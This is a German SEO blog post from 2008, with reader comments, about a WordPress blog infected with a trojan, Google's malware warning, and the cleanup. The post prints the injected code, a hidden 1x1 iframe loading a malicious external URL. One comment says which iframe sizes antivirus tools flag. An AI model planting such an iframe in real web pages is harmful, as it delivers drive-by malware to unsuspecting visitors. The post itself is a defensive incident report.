SEO Marketing Blog
.... googeln bis der Arzt kommt
Wordpress mit Trojaner an Bord – Dank der Google Malware Warnung hoffentlich nur ein temporäres Problem …
WordPress mit Trojaner an Bord & der Google Malware Rettungsanker
Jörg (betreibt ne Segelschule am Bodensee) hat mir gerade anhand der Domain boatbuilder.de (ein bloggender Bootsbaulehrling) per Mail gezeigt, wie Google reagiert, wenn ein WordPress System von nem Trojaner infiziert wurde …
Gesehen hatte ich die Zeile “Diese Website kann Ihren Computer beschädigen.” in Google Suchergebnissen vereinzelt bisher schon ab & an.
Hatte bisher nur kein Bedürfnis oder eigenen Anlass zu untersuchen, was der Auslöser dafür sein könnte …
Das es in der Form seitenweit ein komplettes WordPress System betreffen kann, welches definitv nicht absichtlich als Trojaner-Schleuder genutzt wird, war mir in der Form bisher nur theoretisch bewußt.
Nachtrag: Folgender Iframe wurde über den eingeschleusten Code aufgerufen:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0â€Â³ height=”1â€Â³ width=”1â€Â³></iframe>
Der Google Cache wird für die Seiten nicht mehr angezeigt & man gelangt bei Anklicken des Suchergebnisses auf eine Google Malware Warnung – hier mal der Screenshot der Site-Abfrage:

… und hier wie Google vor dem Besuch der Seite warnt:

Der Code wurde natürlich umgehend aus dem Blog entfernt, ein WordPress Update umgesetzt & Google gebeten, die Seite zu überprüfen & wieder frei zu geben.
@ Jörg, da Du ja hier mitliest: welche WP-Version war es denn, in die der Trojaner eingeschleust wurde?
Wie hiess der Trojaner Code? Sach Bescheid, sobald Du Feedback von Google bekommst oder die Malware Warnung wieder weg ist.
… und last but not least: Danke Dir für das anschauliche Beispiel ;-)
Nachtrag 12.03.2008:
Gerade kam die Info von Jörg, dass Google bereits auf seine Anfrage reagiert hat & obige Malware Warnung in den Suchergebnissen wieder entfernt hat! Eine erfreulich schnelle Reaktion von Google …
Andere Beiträge mit ähnlichen Inhalten, die Dich evtl. auch interessieren könnten:
- Natural Listing ist tot – klickt auf Adwords ;-)
- Code im WordPress Admin-Bereich eingeben
- Google Code Search & weitere Tools
- WordPress 3.1 – Artikel von Unterkategorien nicht in Hauptkategorien anzeigen
- Adware Infektion des PC durch SEO für Schweinegrippe
- Google Open Source Code Projekt Hosting kostenlos
- WordPress XSS Sicherheitslücke + Patch
Der Artikel " WordPress mit Trojaner an Bord & der Google Malware Rettungsanker " enthält 247 Wörter.
Artikel mit verwandten Tags (Keywords, Suchbegriffe)
Tags: google, malware warnung, suchergebnisse, trojaner, update, Wordpress, wp
Am 10.03.08, 13:17 in Google SEO
von Frank veröffentlicht.
RSS Feed für Kommentare.
Du kannst hier kommentieren oder hier per Trackback
von Deinem Blog aus "verewigen".
· Gelesen: 10170 · heute: 4
9 Kommentare zu "WordPress mit Trojaner an Bord & der Google Malware Rettungsanker"
-
10.03.08 um 13:29:54
Hallo Frank, welöche WP Version kann ich leider nicht mehr sagen, war ich doch zu sehr in Sorge :)
Der Trojaner nennt sich “TR/Dldr.HTML.Agent.IS†und wird via iframe über die Seite wp-stats-php(dot)info aufgerufen. Es stand folgender Code in einem Artikel:
Scheint zwar “nur” den IE zu betreffen, aber dennoch. Selbst nach intensiver Recherche konnte ich bis dato nicht herausfinden wie der Code in den WP Beitrag kommt.
Neben WP scheint gleicher Code auch in Joomla häufig vorhanden zu sein. Alles was hilft (da der schädliche Code mit in die DB geschrieben wird) ist den betroffenen Beitrag zu löschen und ggf. danach eben wieder neu anzulegen.
Ich bin mal gespannt wie lange es dauern wird, bis Freund Google die Site wieder Cached und ordentlich listet.
Werde mich melden, wenn es News gibt.
-
@Frank
Keine Angst, der Code wäre deutlich “entstellt” gewesen, so dass er keinen Schaden hätte anrichten können! ;-)Ich habe ihn dir jetzt per Mail geschickt …
-
4. Xel
Joomla ist da extrem anfällig… WordPress aber durch die steigende Verbreitung auch.
Letztens gabs ne Sicherheitslücke in der XMLRPC Schnittstelle – die funktioniert aber nur dann, wenn der Angreifer ein Benutzerkonto im Blog hat, k.a. ob das dort der Fall gewesen sein kann.
Alles was hilft (da der schädliche Code mit in die DB geschrieben wird) ist den betroffenen Beitrag zu löschen und ggf. danach eben wieder neu anzulegen.
Wo steht der denn drin? Im Post oder in nem Kommentar?
Nebenbei könnte man den Post auch einfach über phpMyAdmin bearbeiten – nutzt nur bei einem einmal geknackten System ansich wenig…
-
Hallo Xel,
der schadhafte Code stand im Artikel selbst, nicht in einem Kommentar. Benutzer gab es außer den tatsächlich schreibenden keine weiteren.
-
[ ] Blogvernarrte Leute wie ich, die auf WordPress setzen, haben mit jedem Update immer ein wenig zu tun. Um aber gar nicht erst die Erfahrung eines gehackten Weblogs mit Trojanerfalle zu machen, habe ich schnelle Updates auch alter Weblogs angewöhnt. Was WordPress 2.6 angeht so mag zum Beispiel die Versionierung der Beiträge schön und gut sein, meinem Wunschprofil entspricht das aber nicht. Keineswegs erwarte ich eine eierlegende WordPress-Sau, doch möchte ich folgend einmal mein Wunschprogramm loswerden. ;-) [ ]
-
7. uhi888
Hallo Frank,
vielen Dank für diesen sinnvollen Artikel. Ich hatte auch diesen Sch$%?’*%(-Trojaner in meinen WP-Blog und merkte das auch erst, als meine Besucherzahlen von 300 am Tag auf 30 zusammenbrachen.
Ich habe jetzt manuell die o. g. Einträge via PHPMyAdmin aus der DB entfernt, da sie sich im Quelltext “versteckt” hatten.
Jetzt ist der Blog wieder “trojan free” und ich hoffe auf eine schnelle Reaktion von Google und keinen bösen Besuch mehr. Und ich gelobe: Patches und Updates werden zukünftig noch vor dem Frühstück eingespielt.
Herzliche Grüße
UHI
www.hiltmann.net (wird hoffentlich nicht als kommerzieller Link gewertet ;-) falls doch, bitte löschen … ;-) -
8. Don
Hallo :)
Bei Avira wird übrigens genau das selbe gemeldet, wenn man einen Iframe mit height=0 und width=0 einbindet!
Bei Norton müsste es ein Iframe im Bereich width & height von 1-10 sein, dann wird der Iframe als HTML Virus erkannt.Habe mich bei Avira im Forum gemeldet deswegen,
konnte nichts erreichen, leider :( -
[ ] Blogvernarrte Leute wie ich, die auf WordPress setzen, haben mit jedem Update immer ein wenig zu tun. Um aber gar nicht erst die Erfahrung eines gehackten Weblogs mit Trojanerfalle zu machen, habe ich mir schnelle Updates auch alter Weblogs angewöhnt. Was WordPress 2.6 angeht, so mag zum Beispiel die Versionierung der Beiträge schön und gut sein, meinem Wunschprofil entspricht das aber nicht. Keineswegs erwarte ich eine eierlegende WordPress-Sau, doch möchte ich folgend einmal mein Wunschprogramm loswerden. ;-) [ ]
Entspannen Sie ... wir kümmern uns darum!
Profitieren auch Sie von unserem Google Ranking Know-How!
» Profi Ranking - Suchmaschinenoptimierung «
Suche
Category
Neue Artikel
- 26.12.@15:07: Google Scraper, bzw. SEO Tools & Google
- 02.12.@11:51: Das Google Monopoly erklärt – es gibt nur einen Gewinner :-(
- 17.01.@14:05: Google Chaos & Deepweb/Ajax Exkursionen
- 13.01.@14:43: gute Expired Domains gratis finden
- 05.01.@23:31: SEO Blog & Artikelsterben = “natürlicher” Backlinkschwund …
Neue Kommentare
- 21.02.@16:33
Google Scraper, bzw. SEO Tools & Google - 18.02.@12:10
gute Expired Domains gratis finden - 06.02.@23:51
Google Analytics & Abmahnung?
- 21.02.@16:33
SEO & SEM Tool Tipps:
- Profi Linkanalyse mit SEO-Spyglass
- Automatisches Tracking & Reporting von Google Positionen!
Allgemein
About us
SEO Angeboteby Profi-Ranking.de
SEO Angebote
by Webpromotionportal.com
Web Tipps
Archiv
RSS Feeds


